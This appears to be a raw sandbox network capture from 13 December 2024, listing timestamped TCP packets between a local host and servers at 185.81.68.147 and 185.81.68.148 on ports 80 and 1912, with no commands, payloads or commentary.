                                                                                                                                                                Dec 13, 2024 01:37:25.890938997 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.891099930 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.891144991 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:26.011147022 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:26.011365891 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:26.131361961 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:26.623411894 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:26.656311989 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:26.776254892 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.096738100 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.145351887 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.531460047 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.531640053 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.531698942 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.539254904 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.645991087 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.658981085 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.765779972 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.765870094 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.765964031 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:27.886066914 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:27.886140108 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:28.025763035 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.378494024 CET4975280192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:29.378505945 CET4975180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.394916058 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.394983053 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.395095110 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.396979094 CET4974580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.427761078 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.498323917 CET8049752185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.498405933 CET8049751185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.498430967 CET4975280192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:29.498476028 CET4975180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.498703957 CET4975180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.498817921 CET4975280192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:29.505315065 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.516712904 CET8049745185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.547544956 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.547683001 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.547888041 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.618416071 CET8049751185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.618474007 CET8049752185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.625279903 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.625463963 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.625463963 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.667651892 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.745491982 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:29.748852015 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:29.873089075 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.834928036 CET8049752185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.834966898 CET8049751185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.835138083 CET4975280192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:30.835150003 CET4975180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873532057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873564959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873615980 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873651028 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873665094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873682022 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873701096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873708010 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873737097 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873747110 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873773098 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873776913 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873809099 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873819113 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873868942 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873888016 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873908997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.873914003 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873950958 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.993978024 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.994019985 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.994051933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.994083881 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.998089075 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.998119116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:30.998142004 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.998158932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.066291094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.066386938 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.066431046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.066622019 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.070426941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.070446014 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.070485115 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.070501089 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.078510046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.078546047 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.078572035 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.078588963 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.087297916 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.087352037 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.087428093 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.095253944 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.095307112 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.095372915 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.103621960 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.103741884 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.103807926 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.111968040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.112082958 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.112164974 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.120865107 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.121017933 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.121089935 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.129381895 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.129417896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.129484892 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.137619972 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.137769938 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.137829065 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.144861937 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.145030975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.145100117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.152080059 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.152117014 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.152184010 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.247997046 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.248161077 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.248239040 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.249425888 CET4975480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.257903099 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.258110046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.258169889 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.260171890 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.260308981 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.260360956 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.264688969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.266365051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.266418934 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.266494036 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.266539097 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.270869017 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.270936012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.270941973 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.270979881 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.275392056 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.275451899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.275516987 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.275563955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.279906988 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.279973984 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.280026913 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.284434080 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.284493923 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.284538984 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.284553051 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.288872004 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.289006948 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.289076090 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.293395042 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.293450117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.293519974 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.293565989 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.297882080 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.297982931 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.298038006 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.302354097 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.302467108 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.302520990 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.306889057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.307003021 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.307033062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.307077885 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.311395884 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.311480999 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.311495066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.311531067 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.315855026 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.315907955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.315967083 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.316060066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.320322990 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.320465088 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.320511103 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.324843884 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.324934006 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.325011969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.325058937 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.329294920 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.329355001 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.329406977 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.329544067 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.333802938 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.336157084 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.370357037 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.374191999 CET8049754185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.450289011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.450345993 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.450402975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.450449944 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.452059031 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.452110052 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.452174902 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.452223063 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.455609083 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.456800938 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.456940889 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.456994057 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.457027912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.457077026 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.460457087 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.460511923 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.460576057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.460623980 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.464006901 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.464061975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.464061022 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.464104891 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.467602968 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.467654943 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.467701912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.467880011 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.471115112 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.471282959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.471338987 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.474670887 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.474776983 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.474839926 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.478251934 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.478323936 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.478326082 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.478364944 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.481801987 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.481894016 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.481947899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.485316992 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.485415936 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.485470057 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.485539913 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.488960981 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.489015102 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.489042997 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.489090919 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.490251064 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.490338087 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.490396023 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.492445946 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.492571115 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.492620945 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.495966911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.496062040 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.496093988 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.496139050 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.499561071 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.499634027 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.499682903 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.503066063 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.503101110 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.503119946 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.503170967 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.506654978 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.506732941 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.506783962 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.510195017 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.510229111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.510245085 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.510294914 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.513752937 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.513844013 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.513874054 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.513921022 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.517292976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.517427921 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.517445087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.517468929 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.520879984 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.520931959 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.520951033 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.520991087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.524395943 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.524446011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.524496078 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.527966976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.528018951 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.528088093 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.528132915 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.531549931 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.531599998 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.531653881 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.535036087 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.535146952 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.535176992 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.535192966 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.538584948 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.538695097 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.538758039 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.542217016 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.542280912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.542289019 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.542329073 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.545716047 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.545768023 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.545886040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.545933008 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:31.549264908 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:31.549314022 CET8049753185.81.68.147192.168.2.5
